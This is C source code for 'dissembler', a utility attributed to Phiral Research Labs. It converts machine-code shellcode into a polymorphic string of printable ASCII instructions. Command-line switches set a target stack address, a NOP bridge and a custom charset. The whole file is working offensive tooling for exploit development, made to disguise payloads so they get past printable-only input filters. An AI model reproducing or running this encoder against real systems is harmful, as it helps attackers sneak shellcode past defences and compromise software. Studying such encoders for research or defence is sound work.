/*********************************************************\
*      dissembler               *    File: dissemble.c    *
***********************************************************
*                                                         *
*  Author:        Jose Ronnick <matrix@phiral.com>        *
*  Organization:  Phiral Research Laboratories            *
*                                                         *
*  Like a wolf in sheeps clothing, evil byte code that    *
*  has been dissembled looks like an innocent string.     *
*                                                         *
*   dissemble - dis'sem'ble                               *
*    1. To disguise or conceal behind a false appearance  *
*    2. To make a false show of; feign                    *         
*                                                         *
\*********************************************************/



#include <stdio.h>
#include <sys/stat.h>
#include <ctype.h>
#include <time.h>
#include <stdlib.h>

#define VERSION "1.0"
#define CHAOS 3
#define CHR 
"%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-"
#define MAX_CHR 128

void usage(char *);
void banner();
void shuffle(char *);
char *gen(unsigned int, unsigned int, char *);

int main(int argc, char* argv[])
{
	unsigned int targ=0, next=0, last=0xbfffffe0;
	int i, j, k, len, norm, pad, opt, esc=0, ninja=0,bridge=0;
	char *head=0, *body,*mem, *code=0;
	struct stat buff;
	FILE *fh;
	extern char *optarg;
	extern int optind;

	banner();
	if(argc < 2)
		usage(argv[0]);

	srand(time(NULL));
	len = strlen(CHR);
	
	while((opt = getopt(argc, argv, "Nt:b:c:w:e")) != EOF)
	{
		switch(opt)
		{
			case 't':
				targ = strtoul(optarg, NULL, 0);
				fprintf(stderr, "[t] Target address: 
%p\n", targ);
				break;
			case 'N':
				ninja = 4;
				fprintf(stderr, "[N] Ninja Magic 
Optimization: ON");
				if(targ)
					fprintf(stderr, "\n");
				else
					fprintf(stderr, "  [likes a 
target]\n");
				break;
			case 'b':
				bridge = atoi(optarg);
				fprintf(stderr, "[b] Bridge size: %d 
words\n", bridge);
				break;
			case 'c':
				code = optarg;
				len = strlen(optarg);
				fprintf(stderr, "[c] Using charset: %s 
(%d)\n", code, strlen(code));
				break;
			case 'w':
				head = optarg;
				fprintf(stderr, "[w] Write to Output File: 
%s \n", head);
				break;
			case 'e':
				esc = 1;
				fprintf(stderr, "[e] Escape the backslash: 
ON\n");
				break;
		}
	}

	if(stat(argv[optind], &buff))
	{
		fprintf(stderr,"\nError: problem with source bytecode 
file: %s\n", argv[optind]);
		exit(-1);
	}
	norm = buff.st_size;
	pad = (norm%4)+4;
	//mem = (char *) malloc(len+norm+pad+2+17)+16;
	mem = (char *) malloc(len+norm+pad+2+17+37+((norm+pad)*5))+16;
	strncpy(mem-16, "-....-....-....\0", 16);
	if(code) 
		strncpy(mem, code, len);
	else
		strncpy(mem, CHR, len);
	mem[len] = 0;
	code = mem + len + 2;
	memset(code, 0x90, 8);
	fh = fopen(argv[optind], "r");
	fread(code+pad, norm, 1, fh);
	fclose(fh);

	if(head)
	{
		fh = fopen(head, "w");
		if(!fh)
		{
		fprintf(stderr, "\nError: Couldn't open output file: 
%s\n", head);
		exit(-1);
		}	
	}
	else
		fh = stdout;

	head = code + norm+pad+1;
	body = head + 37;

	if(targ)
	{
		last = targ + 20+ (norm+pad)*5;
		next = 0;
		fprintf(stderr,"[+] Ending address: %p\n", last);
		if(!bridge) bridge = norm/4;
	}

	fprintf(stderr, "[*] Dissembling bytecode from %s...\n", 
argv[optind]);
	opt = 0;
magic:
	i = 37; k=13, j=0;;
	head[k--]=head[j++]=i; i+=i+1;
	head[k--]=i--; head[j++]=i--; k--;
	head[k--]=i--; head[j++]=i++-j+9;
	head[j*2]=i+++k; head[j]=i+++k;
	head[k--]=head[k---1]=i+j++;
	head[k]=i--+j;head[j+k]=i++-k--;
	head[j]=i-k--;head[k]=i+j*k;
	if(CHAOS) shuffle(mem);
	sprintf(head+14, "50,:%sP\\", gen(last, next, mem));

	bzero(body, (norm+pad)*5);
	for(k=norm+pad-4; k >=ninja; k=k-4)
	{
		sscanf(code+k,"%4c",&next);
		if(CHAOS) shuffle(mem);
		strcat(body, gen(next, last, mem));
		strcat(body, "P");
		last = next;
	}
	if((opt != strlen(body) + strlen(head)) && ninja)
	{
	fprintf(stderr, "[!] Optimizing with ninja magic...\n");
	k = strlen(head);
	i = strlen(body);
	opt = k + i;
	last = k + norm + pad + i - ninja;
	last = targ + last;
	next = 0;
	goto magic;
	}

	fprintf(stderr, "--\n");
	if(esc)
		fprintf(fh, "%s\\%s", head, body);
	else
		fprintf(fh, "%s%s", head, body);

	if(!ninja)
	{
		if(!bridge)
			bridge = norm+pad;
		for(i=0; i < bridge; i++)
			fprintf(fh, "P");
	}
	fprintf(fh,"\n");
	if(fh != stdout) close(fh);
	free(mem-16);
}

void banner()
{
	fprintf(stderr, "dissembler %s - polymorphs bytecode to a 
printable ASCII string\n", VERSION);
	fprintf(stderr, " -= Jose Ronnick <matrix@phiral.com> Phiral 
Reseach Labs =-\n");
	fprintf(stderr, "     438C 0255 861A 0D2A 6F6A  14FA 3229 4BD7 
5ED9 69D0\n\n");
}

void usage(char *name)
{
	printf("Usage: %s [switches]  bytecode\n", name);
	printf("\nOptional dissembler switches:\n");
	printf("   -t <target address>  | near where the bytecode is 
going\n");
	printf("   -N                   | optimize with ninja magic\n");
	printf("   -b <NOP bridge size> | number of words in the NOP 
bridge\n");
	printf("   -c <charset>         | which chars are considered 
printable\n");
	printf("   -w <output file>     | write dissembled code to output 
file\n");
	printf("   -e                   | escape the backlash in 
output\n");
	printf("\n");
	exit(0);
}

void shuffle(char *array)
{
	int i, j, len = strlen(array);
	char t;
	for(i=0; i < len*CHAOS; i++)
	{
		j = (int) ((float)len * rand() / (RAND_MAX + 1.0));
		t = array[j];
		array[j] = array[i%len];
		array[i%len] = t;
	}
}	

char* gen(unsigned int targ, unsigned int last, char *X)
{
	unsigned int t[4], l[4];
	unsigned int try, single, carry=0;
	int a, i, j, k, z, flag=0;
	char p[MAX_CHR], q[MAX_CHR], r[MAX_CHR], *pr=X-16;
	int len = strlen(X);

	for(a=0; a < len+2; a++)
		p[a] = q[a] = r[a] = a+1;
	p[len] = q[len] = r[len] = 0;
	if(CHAOS) shuffle(p);
	if(CHAOS) shuffle(q);
	if(CHAOS) shuffle(r);

	pr[5] = pr[10] = '-';
	t[3] = (targ & 0xff000000)>>24;
	t[2] = (targ & 0x00ff0000)>>16;
	t[1] = (targ & 0x0000ff00)>>8;
	t[0] = (targ & 0x000000ff);

	l[3] = (last & 0xff000000)>>24;
	l[2] = (last & 0x00ff0000)>>16;
	l[1] = (last & 0x0000ff00)>>8;
	l[0] = (last & 0x000000ff);

	for(a=1; a < 4; a++)
	{
		carry = flag = 0;
		for(z=0; z < 4; z++)
		{
			for(i=0; i < len; i++)
			{
				for(j=0; j < len; j++)
				{
					for(k=0; k < len; k++)
					{
						if(a < 2) j = len+1;   
if(a < 3) k = len+1;
						try = t[z] + carry + 
X[p[i]-1] + X[q[j]-1] + X[r[k]-1];
						single = (try & 
0x000000ff);
						if(single == l[z])
						{
							carry = (try & 
0x0000ff00)>>8;
							if(i < len) 
pr[1+z]  = X[p[i]-1];
							if(j < len) 
pr[6+z]  = X[q[j]-1];
							if(k < len) 
pr[11+z] = X[r[k]-1];
							i = j = k = len+2;
							flag++;
						}
					}
				}
			}
		}
		if(flag ==4)
		{
			pr[5*a] = 0;
			a = 5;
		}
	}
	if(flag !=4) 
	{
		printf("\nError: Cannot dissemble bytecode with current 
charset.\n");
		exit(-1);
	}
	return pr;
}





